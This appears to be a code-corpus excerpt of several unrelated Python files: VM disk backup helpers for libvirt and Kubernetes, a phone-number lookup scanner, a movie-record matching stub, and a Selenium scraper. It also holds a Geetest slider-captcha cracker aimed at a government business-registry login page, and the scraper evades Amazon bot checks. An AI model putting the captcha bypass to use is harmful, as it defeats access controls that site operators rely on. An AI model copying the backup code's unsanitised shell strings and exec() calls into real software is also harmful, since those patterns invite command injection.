ss_info = get_disk_info(ss_full_path)
except ExecuteException:
pass
if ss_info:
if 'backing_filename' in list(ss_info.keys()):
old_backing_file = ss_info['backing_filename']
new_backing_file = old_backing_file.replace(old_disk_dir, disk_dir)
logger.debug('old backing file %s, new backing file %s' % (old_backing_file, new_backing_file))
if os.path.exists(new_backing_file):
runCmd('qemu-img rebase -u -b %s %s' % (new_backing_file, ss_full_path))
jsondicts = get_disk_jsondict(pool, vol)
apply_all_jsondict(jsondicts)
def apply_all_jsondict(jsondicts):
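    # Dump all custom-resource dicts into a single temporary YAML file and
    # 'kubectl apply' it, retrying on transient errors.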
if len(jsondicts) == 0:
return
logger.debug(jsondicts)
filename = randomUUID()
logger.debug(filename)
for i in range(30):
with open('/tmp/%s.yaml' % filename, 'w') as f:
for i in range(len(jsondicts)):
current_jsondict = replaceData(jsondicts[i])
result = yaml.safe_dump(current_jsondict)
f.write(result)
if i != len(jsondicts) - 1:
f.write('---\n')
try:
logger.debug("jsondicts: /tmp/%s.yaml" % filename)
runCmd('kubectl apply -f /tmp/%s.yaml' % filename)
# try:
# runCmd('rm -f /tmp/%s.yaml' % filename)
# except ExecuteException:
# pass
return
except ExecuteException as e:
logger.debug(e.message)
if e.message.find('Warning') >= 0 or e.message.find(
'failed to open a connection to the hypervisor software') >= 0:
pass
raise ExecuteException('RunCmdError', 'can not apply jsondict %s on k8s.' % dumps(jsondicts))
def create_all_jsondict(jsondicts):
if len(jsondicts) == 0:
return
filename = randomUUID()
logger.debug(filename)
with open('/tmp/%s.yaml' % filename, 'w') as f:
for i in range(len(jsondicts)):
result = yaml.safe_dump(jsondicts[i])
f.write(result)
if i != len(jsondicts) - 1:
f.write('---\n')
for i in range(30):
try:
runCmd('kubectl create -f /tmp/%s.yaml' % filename)
# if result['result'] != 0:
# raise ExecuteException('RunCmdError', result['result']['msg'])
try:
runCmd('rm -f /tmp/%s.yaml' % filename)
except ExecuteException:
pass
return
except ExecuteException as e:
logger.debug(e.message)
if e.message.find('Warning') >= 0 or e.message.find(
'failed to open a connection to the hypervisor software') >= 0:
pass
raise ExecuteException('RunCmdError', 'can not apply jsondict %s on k8s.' % dumps(jsondicts))
def get_node_ip_by_node_name(nodeName):
all_node_ip = get_all_node_ip()
if all_node_ip:
for ip in all_node_ip:
if ip['nodeName'] == nodeName:
return ip['ip']
return None
def get_node_name_by_node_ip(ip):
all_node_ip = get_all_node_ip()
nic_ips = get_remote_node_all_nic_ip(ip)
if all_node_ip:
for node in all_node_ip:
if node['ip'] in nic_ips and node['nodeName'].find("vm.") >= 0:
return node['nodeName']
return None
def get_vm_xml(domain):
return runCmdAndGetOutput('virsh dumpxml %s' % domain)
def xmlToJson(xmlStr):
return dumps(bf.data(fromstring(xmlStr)), sort_keys=True, indent=4)
def toKubeJson(json):
return json.replace('@', '_').replace('$', 'text').replace(
'interface', '_interface').replace('transient', '_transient').replace(
'nested-hv', 'nested_hv').replace('suspend-to-mem', 'suspend_to_mem').replace('suspend-to-disk',
'suspend_to_disk')
def _addListToSpecificField(data):
if isinstance(data, list):
return data
else:
return [data]
'''
Cautions! Do not modify this function because it uses reflections!
'''
def _userDefinedOperationInList(field, jsondict, alist):
jsondict = jsondict[field]
tmp = jsondict
do_it = False
for index, value in enumerate(alist):
if index == 0:
if value != field:
break
continue
tmp = tmp.get(value)
if not tmp:
do_it = False
break
do_it = True
if do_it:
tmp2 = None
for index, value in enumerate(alist):
if index == 0:
tmp2 = 'jsondict'
else:
tmp2 = '{}[\'{}\']'.format(tmp2, value)
exec(('{} = {}').format(tmp2, _addListToSpecificField(tmp)))
return
def updateDomain(jsondict):
for line in vmArray:
alist = line.split('-')
_userDefinedOperationInList('domain', jsondict, alist)
return jsondict
def modifyVMOnNode(domain):
helper = K8sHelper('VirtualMachine')
try:
jsonDict = helper.get(domain)
vm_xml = get_vm_xml(domain)
vm_json = toKubeJson(xmlToJson(vm_xml))
vm_json = updateDomain(loads(vm_json))
vm_json = updateJsonRemoveLifecycle(jsonDict, vm_json)
jsonDict = addPowerStatusMessage(vm_json, 'Running', 'The VM is running.')
helper.updateAll(domain, jsonDict)
except:
pass
# def checkVMDiskFileChanged():
# p = subprocess.Popen('virt-diff ', shell=True, stdout=subprocess.PIPE)
# try:
# while True:
# output = p.stdout.readline()
# if output == '' and p.poll() is not None:
# break
# if output:
# # print output.strip()
# p.terminate()
# except Exception:
# traceback.print_exc()
# finally:
# p.stdout.close()
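# MD5 digest of a file, read in block_size chunks so large disk images do not
# have to fit in memory.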
def checksum(path, block_size=8192):
with open(path, "rb") as f:
file_hash = hashlib.md5()
while True:
data = f.read(block_size)
if not data:
break
file_hash.update(data)
return file_hash.hexdigest()
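# Return the disk's current full-backup version recorded in history.json under
# the pool's vmbackup directory; if that record is stale, fall back to the
# newest full backup by timestamp.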
def get_disk_backup_current(domain, pool, disk):
pool_info = get_pool_info_from_k8s(pool)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
history_file_path = '%s/history.json' % disk_backup_dir
if not os.path.exists(history_file_path):
raise ExecuteException('', 'can not find disk %s current full backup version in %s' % (
disk, history_file_path))
with open(history_file_path, 'r') as f:
history = load(f)
if 'current' not in list(history.keys()):
raise ExecuteException('', 'disk %s backup version not exist current full backup version. plz check %s' % (
disk, history_file_path))
if history['current'] in list(history.keys()):
return history['current']
else:
disk_versions = get_disk_backup_full_version(domain, pool, disk)
if len(disk_versions) == 0:
raise ExecuteException('',
'disk %s backup version not exist full backup version. plz check %s' % (
disk, history_file_path))
time = 0.0
newestV = None
for fv in disk_versions:
for v in list(history[fv].keys()):
if history[fv][v]['time'] > time:
time = history[fv][v]['time']
newestV = fv
if newestV is None:
raise ExecuteException('',
'disk %s backup version not exist full backup version. plz check %s' % (
disk, history_file_path))
else:
return newestV
def is_disk_backup_exist(domain, pool, disk, version):
pool_info = get_pool_info_from_k8s(pool)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
history_file = '%s/history.json' % disk_backup_dir
if not os.path.exists(history_file):
return False
with open(history_file, 'r') as f:
history = load(f)
for full_version in list(history.keys()):
if full_version == 'current':
continue
if version in list(history[full_version].keys()):
return True
return False
def is_vm_backup_exist(domain, pool, version):
pool_info = get_pool_info_from_k8s(pool)
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], domain)
history_file_path = '%s/history.json' % backup_dir
if not os.path.exists(history_file_path):
return False
with open(history_file_path, 'r') as f:
history = load(f)
if version in list(history.keys()):
return True
return False
def is_remote_vm_backup_exist(domain, version, remote, port, username, password):
target_dir = '/vmbackup/%s' % domain
ftp = FtpHelper(remote, port, username, password)
history_file = '%s/history.json' % target_dir
if ftp.is_exist_dir(target_dir) and ftp.is_exist_file(history_file):
history = ftp.get_json_file_data(history_file)
if history and version in list(history.keys()):
return True
return False
def get_full_version(domain, pool, disk, version):
pool_info = get_pool_info_from_k8s(pool)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
history_file = '%s/history.json' % disk_backup_dir
if not os.path.exists(history_file):
raise ExecuteException('', 'not exist history file %s' % history_file)
with open(history_file, 'r') as f:
history = load(f)
logger.debug(dumps(history))
for full_version in list(history.keys()):
if full_version == 'current':
continue
if version in list(history[full_version].keys()):
return full_version
raise ExecuteException('', 'not exist disk %s full backup version in history file %s.' % (disk, history_file))
def get_full_version_by_history(disk, version, history):
for full_version in list(history.keys()):
if full_version == 'current':
continue
if version in list(history[full_version].keys()):
return full_version
raise ExecuteException('', 'not exist disk %s backup version %s in history %s.' % (disk, version, dumps(history)))
def get_disk_backup_version(domain, pool, disk):
pool_info = get_pool_info_from_k8s(pool)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
vm_history_file = '%s/vmbackup/%s/history.json' % (pool_info['path'], domain)
vm_disk_full_versions = set()
if os.path.exists(vm_history_file):
with open(vm_history_file, 'r') as f:
vm_history = load(f)
for v in list(vm_history.keys()):
record = vm_history[v]
if disk in list(record.keys()):
vm_disk_full_versions.add(record[disk]['full'])
history_file = '%s/history.json' % disk_backup_dir
disk_versions = []
if os.path.exists(history_file):
with open(history_file, 'r') as f:
history = load(f)
logger.debug(dumps(history))
for full_version in list(history.keys()):
if full_version == 'current':
continue
if full_version in vm_disk_full_versions:
continue
for v in list(history[full_version].keys()):
disk_versions.append(v)
return disk_versions
def get_disk_backup_full_version(domain, pool, disk):
pool_info = get_pool_info_from_k8s(pool)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
vm_history_file = '%s/vmbackup/%s/history.json' % (pool_info['path'], domain)
vm_disk_full_versions = set()
if os.path.exists(vm_history_file):
with open(vm_history_file, 'r') as f:
vm_history = load(f)
for v in list(vm_history.keys()):
record = vm_history[v]
if disk in list(record.keys()):
vm_disk_full_versions.add(record[disk]['full'])
history_file = '%s/history.json' % disk_backup_dir
if not os.path.exists(history_file):
raise ExecuteException('', 'not exist history file %s' % history_file)
disk_versions = []
with open(history_file, 'r') as f:
history = load(f)
logger.debug(dumps(history))
for full_version in list(history.keys()):
if full_version == 'current':
continue
if full_version in vm_disk_full_versions:
continue
disk_versions.append(full_version)
return disk_versions
def get_remote_disk_backup_version(domain, disk, remote, port, username, password):
vm_history_file = '/vmbackup/%s/history.json' % domain
ftp = FtpHelper(remote, port, username, password)
vm_history = ftp.get_json_file_data(vm_history_file)
vm_disk_full_versions = set()
if vm_history:
for v in list(vm_history.keys()):
record = vm_history[v]
if disk in list(record.keys()):
vm_disk_full_versions.add(record[disk]['full'])
disk_versions = []
disk_backup_dir = '/vmbackup/%s/diskbackup/%s' % (domain, disk)
history_file = '%s/history.json' % disk_backup_dir
history = ftp.get_json_file_data(history_file)
if history:
logger.debug(dumps(history))
for full_version in list(history.keys()):
if full_version == 'current':
continue
if full_version in vm_disk_full_versions:
continue
for v in list(history[full_version].keys()):
disk_versions.append(v)
return disk_versions
def is_remote_disk_backup_exist(domain, disk, version, remote, port, username, password):
target_dir = '/vmbackup/%s/diskbackup/%s' % (domain, disk)
ftp = FtpHelper(remote, port, username, password)
if ftp.is_exist_dir(target_dir) and ftp.is_exist_file('%s/history.json' % target_dir):
history = ftp.get_json_file_data('%s/history.json' % target_dir)
if disk not in list(history.keys()):
return False
for full_version in list(history.keys()):
if full_version == 'current':
continue
if version in list(history[full_version].keys()):
return True
return False
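# Collect the current disk image and its whole backing-file chain, copy each
# file into <backup_path>/diskbackup (deduplicated by checksum), and return the
# chain records plus the list of files that were actually copied.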
def backup_snapshots_chain(current, backup_path):
if not os.path.exists(current):
raise ExecuteException('', 'not exist disk dir need to backup: %s' % current)
result = {}
result['current'] = get_disk_info(current)['full_backing_filename']
backup_files = set()
image_file = None
chains = []
checksums = {}
# only backup the current chain
old_current = result['current']
backup_files.add(old_current)
# back up disk image
disk_info = get_disk_info(old_current)
while 'full_backing_filename' in list(disk_info.keys()):
backup_files.add(disk_info['full_backing_filename'])
disk_info = get_disk_info(disk_info['full_backing_filename'])
# record snapshot chain
disk_backup_dir = '%s/diskbackup' % backup_path
backed_disk_file = []
try:
for bf in backup_files:
disk_checksum = backup_file(bf, disk_backup_dir, backed_disk_file)
checksums[bf] = disk_checksum
except Exception as e:
try:
for df in backed_disk_file:
runCmd('rm -f %s' % df)
except:
pass
raise e
for bf in backup_files:
disk_info = get_disk_info(bf)
record = {}
record['path'] = bf
record['checksum'] = checksums[bf]
if 'full_backing_filename' in list(disk_info.keys()):
record['parent'] = disk_info['full_backing_filename']
else:
record['parent'] = ''
chains.append(record)
result['chains'] = chains
return result, backed_disk_file
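# Copy a single file into target_dir unless an identical copy (same MD5) is
# already recorded in checksum.json; return the file's checksum.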
def backup_file(file, target_dir, backed_disk_file):
# print file
if not os.path.exists(target_dir):
os.makedirs(target_dir)
file_checksum = checksum(file)
logger.debug('%s checksum: %s' % (file, file_checksum))
history_file = '%s/checksum.json' % target_dir
backupRecord = None
history = {}
if os.path.exists(history_file):
with open(history_file, 'r') as f:
history = load(f)
if file_checksum in list(history.keys()):
backupRecord = history[file_checksum]
if not backupRecord:
# backup file
target = '%s/%s' % (target_dir, os.path.basename(file))
if os.path.exists(target):
uuid = randomUUID().replace('-', '')
target = '%s/%s' % (target_dir, uuid)
backed_disk_file.append(target)
runCmd('cp -f %s %s' % (file, target))
# dump history
history[file_checksum] = os.path.basename(target)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
with open(history_file, 'w') as f:
dump(history, f)
return file_checksum
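# Restore a backed-up snapshot chain into target_dir: copy back any chain file
# whose checksum is not already present, rewire parent links with
# `qemu-img rebase -u`, and return the restored current image path together
# with the files that are safe to delete afterwards.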
def restore_snapshots_chain(disk_back_dir, record, target_dir):
vm_backup_path = os.path.dirname(disk_back_dir)
backup_path = os.path.dirname(vm_backup_path)
# disk_back_dir = '%s/diskbackup' % vm_backup_path
checksum_file = '%s/checksum.json' % disk_back_dir
with open(checksum_file, 'r') as f:
checksums = load(f)
old_to_new = {}
cp_disks = []
chains = record['chains']
try:
# copy every file and rebuild the chain
# logger.debug(dumps(record))
disk_checksums = {}
for d in os.listdir(target_dir):
if d == 'config.json' or d == 'snapshots':
continue
f = '%s/%s' % (target_dir, d)
c = checksum('%s/%s' % (target_dir, d))
disk_checksums[c] = f
snapshot_dir = '%s/snapshots' % target_dir
if os.path.exists(snapshot_dir):
for d in os.listdir(snapshot_dir):
f = '%s/%s' % (snapshot_dir, d)
c = checksum('%s/%s' % (snapshot_dir, d))
disk_checksums[c] = f
for chain in chains:
# print chain['path']
if chain['checksum'] not in list(checksums.keys()):
raise ExecuteException('', 'can not find disk file backup checksum.')
if chain['checksum'] in list(disk_checksums.keys()):
old_to_new[chain['path']] = disk_checksums[chain['checksum']]
logger.debug('do not need cp %s ' % disk_checksums[chain['checksum']])
continue
backup_file = '%s/%s' % (disk_back_dir, checksums[chain['checksum']])
if not os.path.exists(backup_file):
raise ExecuteException('', 'can not find disk backup file %s.' % backup_file)
if chain['parent']:
new_disk_file = '%s/%s' % (target_dir, os.path.basename(chain['path']))
if chain['path'].find(target_dir) < 0:
uuid = randomUUID().replace('-', '')
new_disk_file = '%s/%s' % (target_dir, uuid)
old_to_new[chain['path']] = new_disk_file
runCmd('cp -f %s %s' % (backup_file, new_disk_file))
cp_disks.append(new_disk_file)
else:
# base image
# if the image already exists, skip the copy
di_helper = K8sHelper('VirtualMachineDiskImage')
image = os.path.basename(chain['path'])
if di_helper.exist(image):
volume = di_helper.get_data(image, 'volume')
logger.debug('volume')
logger.debug(volume)
if volume and isinstance(volume, dict) and os.path.exists(volume['current']) and checksum(
volume['current']) == chain['checksum']:
old_to_new[chain['path']] = volume['current']
continue
logger.debug('base image: start cp')
if chain['path'].find('snapshots') >= 0:
base_file = '%s/snapshots/%s' % (target_dir, os.path.basename(chain['path']))
else:
base_file = '%s/%s' % (target_dir, os.path.basename(chain['path']))
new_disk_file = '%s/%s' % (target_dir, os.path.basename(chain['path']))
if not os.path.exists(base_file):
old_to_new[chain['path']] = new_disk_file
runCmd('cp -f %s %s' % (backup_file, new_disk_file))
cp_disks.append(new_disk_file)
else:
base_image_checksum = checksum(base_file)
if base_image_checksum == chain['checksum']:
old_to_new[chain['path']] = base_file
else:
old_to_new[chain['path']] = new_disk_file
runCmd('cp -f %s %s' % (backup_file, new_disk_file))
cp_disks.append(new_disk_file)
for df in list(old_to_new.values()):
runCmd('chmod 666 %s' % df)
except ExecuteException as e:
for file in cp_disks:
runCmd('rm -f %s' % file)
raise e
logger.debug('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
logger.debug(dumps(disk_checksums))
logger.debug(dumps(chains))
# reconnect snapshot chain
for chain in chains:
# print dumps(chain)
if chain['parent']:
# parent = '%s/%s' % (disk_dir, os.path.basename(chain['parent']))
# print 'qemu-img rebase -f qcow2 -b %s %s' % (old_to_new[chain['parent']], old_to_new[chain['path']])
runCmd('qemu-img rebase -f qcow2 -u -b %s %s' % (old_to_new[chain['parent']], old_to_new[chain['path']]))
# if this disk has no snapshots, try to delete the leftover files
ss_dir = '%s/snapshots' % target_dir
exist_ss = False
if os.path.exists(ss_dir):
for ss in os.listdir(ss_dir):
try:
ss_info = get_snapshot_info_from_k8s(ss)
exist_ss = True
except:
pass
file_to_delete = []
if not exist_ss:
if os.path.exists(ss_dir):
for ss in os.listdir(ss_dir):
ss_file = '%s/%s' % (ss_dir, ss)
if os.path.isfile(ss_file) and ss_file not in list(old_to_new.values()):
file_to_delete.append(ss_file)
if os.path.exists(target_dir):
for ss in os.listdir(target_dir):
if ss == 'config.json':
continue
ss_file = '%s/%s' % (target_dir, ss)
if os.path.isfile(ss_file) and ss_file not in list(old_to_new.values()):
file_to_delete.append(ss_file)
# if backup_disk['current'].find('snapshots') >= 0:
# disk_current = '%s/snapshots/%s' % (disk_dir, os.path.basename(backup_disk['current']))
# else:
# disk_current = '%s/%s' % (disk_dir, os.path.basename(backup_disk['current']))
disk_current = record['current']
return old_to_new[disk_current], file_to_delete
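# Make sure the storage pool is active on this node (auto-mount and
# `virsh pool-start` if needed), refresh the pool record in k8s when it has
# changed, and report an error if the pool is still not active.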
def check_pool_active(info):
pool_helper = K8sHelper('VirtualMachinePool')
this_node_name = get_hostname_in_lower_case()
pool_node_name = get_node_name(pool_helper.get(info['pool']))
if this_node_name != pool_node_name:
if info['state'] == 'inactive':
error_print(220, 'pool %s is not active, please run "startPool" first' % info['pool'])
else:
return
if this_node_name == pool_node_name and info['state'] == 'active':
try:
auto_mount(info['pool'])
if not is_pool_started(info['poolname']):
runCmd('virsh pool-start %s' % info['poolname'])
except ExecuteException as e:
error_print(221, e.message)
result = get_pool_info_to_k8s(info['pooltype'], info['pool'], info['url'], info['poolname'], info['content'])
# update pool
if not operator.eq(info, result):  # only update k8s when the pool info has changed
k8s = K8sHelper('VirtualMachinePool')
try:
k8s.update(info['pool'], 'pool', result)
except:
pass
if result['state'] != 'active':
error_print(221, 'pool %s is not active, please run "startPool" first' % info['pool'])
def change_k8s_pool_state(pool, state):
helper = K8sHelper("VirtualMachinePool")
pool_info = helper.get_data(pool, "pool")
pool_info['state'] = state
helper.update(pool, 'pool', pool_info)
def success_print(msg, data):
print(dumps({"result": {"code": 0, "msg": msg}, "data": data}))
# exit(0)
def error_print(code, msg, data=None):
if data is None:
print(dumps({"result": {"code": code, "msg": msg}, "data": {}}))
# exit(1)
else:
print(dumps({"result": {"code": code, "msg": msg}, "data": data}))
# exit(1)
if __name__ == '__main__':
print(get_pool_info('07098ca5fd174fccafee76b0d7fccde4'))
print(runCmdAndTransferXmlToJson('virsh pool-dumpxml 07098ca5fd174fccafee76b0d7fccde4'))
# print is_pool_started("170dd9accdd174caced76b0db2230")
# print get_all_node_ip()
# check_pool_active(get_pool_info_from_k8s('migratenodepool22'))
# print is_vm_exist('dsadada')
# pool_helper = K8sHelper('VirtualMachinePool')
# # pool_info = get_pool_info_to_k8s('nfs', 'migratepoolnodepool22', '170dd9accdd174caced76b0db2223', 'vmd')
# # pool_helper.update('migratepoolnodepool22', 'pool', pool_info)
# pool_helper.delete_lifecycle('migratepoolnodepool22')
# print get_os_disk("cloudinitbackup")
# print get_pools_by_node('vm.node25')
# print get_pool_info_from_k8s('7daed7737ea0480eb078567febda62ea')
# jsondicts = get_migrate_disk_jsondict('vm006migratedisk1', 'migratepoolnode35')
# apply_all_jsondict(jsondicts)
# print get_snapshot_info_from_k8s('disktestd313.2')
# print get_pool_info(' node22-poolnfs')
# print is_vm_disk_not_shared_storage('vm006')
# print change_vm_os_disk_file('vm010', '/uit/pooluittest/diskuittest/snapshots/diskuittest.2', '/uit/pooluittest/diskuittest/snapshots/diskuittest.1')
# print get_all_snapshot_to_delete('/var/lib/libvirt/pooltest/disktest/disktest', '/var/lib/libvirt/pooltest/disktest/ss3')
# print os.path.basename('/var/lib/libvirt/pooltest/disktest/disktest')
# print get_disk_snapshots('/var/lib/libvirt/pooltest/disktest/ss1')
# print get_pool_info('test1')
# print get_sn_chain_path('/var/lib/libvirt/pooltest/disktest/0e8e48d9-b6ab-4477-999d-0e57b521a51b')
``` |
{
"source": "742fool/DeadTrapv2",
"score": 3
} |
#### File: DeadTrapv2/scanners/basicScan.py
```python
import json
import requests
import phonenumbers
from phonenumbers import geocoder
from phonenumbers import carrier
from phonenumbers import timezone
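# Parse and validate the number locally with the phonenumbers library, resolve
# the country via the restcountries API, then print formats, location, carrier
# and timezone details.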
def libphonenumbers(number):
print('\n[*] Running local scan...\n')
try:
phonenumber = phonenumbers.parse(number, None)
except:
return False
else:
if not phonenumbers.is_valid_number(phonenumber):
return False
number = phonenumbers.format_number(phonenumber, phonenumbers.PhoneNumberFormat.E164).replace('+', '')
numberCountryCode = phonenumbers.format_number(phonenumber, phonenumbers.PhoneNumberFormat.INTERNATIONAL).split(' ')[0]
countryRequest = json.loads(requests.request('GET', 'https://restcountries.eu/rest/v2/callingcode/{}'.format(numberCountryCode.replace('+', ''))).content)
numberCountry = countryRequest[0]['alpha2Code']
localNumber = phonenumbers.format_number(phonenumber, phonenumbers.PhoneNumberFormat.E164).replace(numberCountryCode, '')
internationalNumber = phonenumbers.format_number(phonenumber, phonenumbers.PhoneNumberFormat.INTERNATIONAL)
print('[+] International format: {}'.format(internationalNumber))
print('[+] Local format: 0{}'.format(localNumber))
print('[+] Country code: {}'.format(numberCountryCode))
print('[+] Location: {}'.format(geocoder.description_for_number(phonenumber, "en")))
print('[+] Carrier: {}'.format(phonenumbers.carrier.name_for_number(phonenumber, 'en')))
for libphonenumbers.timezoneResult in timezone.time_zones_for_number(phonenumber):
print('[+] Timezone: {}'.format(libphonenumbers.timezoneResult))
if phonenumbers.is_possible_number(phonenumber):
print('[*] The number is valid and possible.')
else:
print('(!) The number is valid but might not be possible.')
``` |
{
"source": "743834110/crack-geetest",
"score": 3
} |
#### File: 743834110/crack-geetest/industry_and_commerce.py
```python
import time
from geetest import BaseGeetestCrack
from selenium import webdriver
class IndustryAndCommerceGeetestCrack(BaseGeetestCrack):
"""Cracker for the gsxt (industry & commerce) slider captcha."""
def __init__(self, driver):
super(IndustryAndCommerceGeetestCrack, self).__init__(driver)
def crack(self):
"""Run the cracking procedure."""
self.input_by_id()
self.click_by_id()
time.sleep(2)
x_offset = self.calculate_slider_offset()
self.drag_and_drop(x_offset=x_offset)
def main():
driver = webdriver.Chrome()
driver.get("http://bj.gsxt.gov.cn/sydq/loginSydqAction!sydq.dhtml")
cracker = IndustryAndCommerceGeetestCrack(driver)
cracker.crack()
print(driver.get_window_size())
time.sleep(3)
driver.save_screenshot("screen.png")
driver.close()
if __name__ == "__main__":
main()
``` |
{
"source": "745184532/cmdb",
"score": 2
} |
#### File: cmdb/chain/consumers.py
```python
from asgiref.sync import async_to_sync
from channels.generic.websocket import WebsocketConsumer
from channels.layers import get_channel_layer
channel_layer = get_channel_layer()
class EchoConsumer(WebsocketConsumer):
def connect(self):
# create a channels group named after the username and register it in Redis via the channel layer
async_to_sync(self.channel_layer.group_add)(self.scope['user'].username, self.channel_name)
# accept the connection; incoming frames are handled by receive()
self.accept()
def receive(self, text_data):
async_to_sync(self.channel_layer.group_send)(
self.scope['user'].username,
{
"type": "user.message",
"text": text_data,
},
)
def user_message(self, event):
# consume the group message and push it to the client
self.send(text_data=event["text"])
def disconnect(self, close_code):
async_to_sync(self.channel_layer.group_discard)(self.scope['user'].username, self.channel_name)
# class StatsConsumer(WebsocketConsumer):
#
# def connect(self):
# async_to_sync(self.channel_layer.group_add)(self.scope['user'].username, self.channel_name)
#
# self.accept()
#
# def receive(self, text_data):
# key = '-'.join(('django-mstats-processlist', str(self.scope['user'].uid)))
# cache.set(key, 'start', timeout=None)
# show_processlist.delay(host=text_data, user=self.scope['user'].username, key=key)
#
# async_to_sync(self.channel_layer.group_send)(
# self.scope['user'].username,
# {
# "type": "user.message",
# "text": text_data,
# },
# )
#
# def user_message(self, event):
# self.send(text_data=event["text"])
#
# def disconnect(self, close_code):
# key = '-'.join(('django-mstats-processlist', str(self.scope['user'].uid)))
# cache.set(key, 'end', timeout=None)
# async_to_sync(self.channel_layer.group_discard)(self.scope['user'].username, self.channel_name)
``` |
{
"source": "745184533/Lab-s-Data-Warehouse",
"score": 3
} |
#### File: 数据准备/数据处理/MovieOrganize.py
```python
import pandas as pd
import numpy as np
import Levenshtein
import re
import math
import codecs
import csv
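# Similarity score between product records i and j; the per-feature scores are
# initialized here, but the combination logic is still a placeholder and the
# function currently returns the constant 1.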
def calculate(i,j):
# overall similarity
score=1
# per-feature similarity scores
score_name=1
score_director=1
score_actor=1
score_release=1
score_time=1
# feature values
movie_l=webs[i]
name_l=movie_l[2]
director_l=movie_l[15]
actor_l=movie_l[6]
release_l=movie_l[4]
time_l=movie_l[5]
movie_r=webs[j]
name_r=movie_r[2]
director_r=movie_r[15]
actor_r=movie_r[6]
release_r=movie_r[4]
time_r=movie_r[5]
return score
CSV="MovieProducts.csv"
data=pd.read_csv(CSV)
data=np.array(data)
webs=[] # list of web page records (204654 rows)
for frame in data:
j = 0
for i in frame:
if pd.isna(i):
frame[j] = ""
j += 1
webs.append(frame.tolist())
map=[[0]for i in range(len(webs))] # adjacency list of page similarity (204654 entries)
movies=[] # movie partitions, filled with record indices; full data can be looked up in webs
left=0
right=1
HumanSense=0.5 # products with similarity above 0.5 are treated as the same movie
# build the adjacency list
for i in range(len(webs)-1):
for j in range(len(webs)-i-1):
left=i
right=j+i+1
similar=calculate(left,right)
print("{}->{}:{}\n".format(left,right,similar))
if similar>=HumanSense:
map[left].append(right)
map[right].append(left)
i=0
```
#### File: 数据准备/爬虫/Team.py
```python
import codecs
import csv
import re
import time
from bs4 import BeautifulSoup as BS
from selenium import webdriver
import signal
import os
def ChromeSet(): # Chrome webdriver
optC = webdriver.ChromeOptions()
optC.add_argument('--lang=en') # set the page language
optC.add_argument('blink-settings=imagesEnabled=false') # skip image loading to speed things up
#optC.add_argument('--headless') # headless mode (no browser UI)
return webdriver.Chrome(options=optC)
def EdgeSet(): # Edge webdriver
return webdriver.Edge()
def FireFoxSet(): # Firefox webdriver
optF=webdriver.FirefoxOptions()
optF.add_argument('--lang=en') # set the page language
optF.add_argument('blink-settings=imagesEnabled=false') # skip image loading to speed things up
#optF.add_argument('--headless') # headless mode (no browser UI)
return webdriver.Firefox(options=optF)
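# Re-queue a URL that failed to load: append it back to the pending list/file
# up to three times, then record it as unsolved; also advances the browser
# rotation counter.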
def resetUrl(URL):
bannedNum = bannedUrl.get(URL, 0)
if (bannedNum == 0):
bannedUrl[URL] = 1
URLLIST.append(URL + '\n')
url = open(Rest, "a+")
url.write(URL+"\n")
url.close()
browser[0] += 1
elif (bannedNum <= 2):
bannedUrl[URL] = bannedNum + 1
URLLIST.append(URL + '\n')
url = open(Rest, "a+")
url.write(URL+"\n")
url.close()
browser[0] += 1
else:
unsolvedUrl = open(UnSOLVED, "a") # URLs that could not be reached
unsolvedUrl.write("{}\n".format(URL))
unsolvedUrl.close()
browser[0] += 1
#time.sleep(30)
def get_pid(driver):
# chromepid = int(driver.service.process.pid)
pid=int(driver.service.process.pid)
i=0
return (pid)
def kill_browser(pid):
try:
os.kill(pid, signal.SIGTERM)
return 1
except:
return 0
def closeBrowser(driver):
pid=0
try:
pid=get_pid(driver)
driver.close()
driver.quit()
except:
print("cant close the process!")
else:
print("close the process successfully!")
try:
kill_browser(pid)
except:
print("cant kill the process!")
else:
print("kill the process successfully!")
def connect_to_web(URL,order): # fetch the page and extract its data
Data=[]
driver = None
try: # browser selection: if a browser is not installed, comment out its setup function and switch the calls below to one with an installed driver (Chrome and Edge preferred; Firefox triggers captchas more often)
if(browser[0]%3==0):
driver=ChromeSet()
elif(browser[0]%3==1):
driver=FireFoxSet()
else:
driver=ChromeSet()
except:
time.sleep(3)
print("\nWebsite {} Driver not ready ,jump!".format(order)) # driver failure handling
resetUrl(URL)
try:
closeBrowser(driver)
except:
return
return
try:
driver.get("https://www."+URL)
#time.sleep(3)
except: # page-load timeout handling
time.sleep(3)
print("\nWebsite {} timeout ,jump!".format(order)) # get() timeout handling
resetUrl(URL)
try:
closeBrowser(driver)
except:
return
return
try: # determine the page type
name=driver.find_element_by_css_selector("[class='_1GTSsh _2Q73m9']").text
except: # scrape a Movie & TV product page
try: # get the Movie & TV title
name=driver.find_element_by_id("productTitle").text
except: # handle abnormal pages
time.sleep(3)
print("\nWebsite {} kill the robot ,jump!".format(order)) # captcha / inaccessible page handling
resetUrl(URL)
try:
closeBrowser(driver)
except:
return
return
else:
Data.append(urlOrder[0])
Data.append(URL)
Data.append(name)
try:
# fetch the product-detail HTML
data=driver.find_element_by_css_selector("[class='a-unordered-list a-nostyle a-vertical a-spacing-none detail-bullet-list']").get_attribute('innerHTML')
except: # nothing found: fill with empty values
Data.append(URL[-10:])
Data.append("")
Data.append("")
Data.append("")
Data.append("")
Data.append("")
else:
# regex-match the fields out of the HTML
ReleaseTime=re.search(r"(?<=Release date\n:\n</span>\n<span>).*?(?=</)",data)
Time = re.search(r"(?<=Run time\n:\n</span>\n<span>).*?(?=</)", data)
Director = re.search(r"(?<=Director\n:\n</span>\n<span>).*?(?=</)", data)
Writer = re.search(r"(?<=Writers\n:\n</span>\n<span>).*?(?=</)", data)
Actors = re.search(r"(?<=Actors\n:\n</span>\n<span>).*?(?=</)", data)
Data.append(URL[-10:])
if (ReleaseTime == None):
Data.append("")
else:
Data.append(ReleaseTime.group(0))
if (Time == None):
Data.append("")
else:
Data.append(Time.group(0))
if (Director == None):
Data.append("")
else:
Data.append(Director.group(0))
if (Writer == None):
Data.append("")
else:
Data.append(Writer.group(0))
if (Actors == None):
Data.append("")
else:
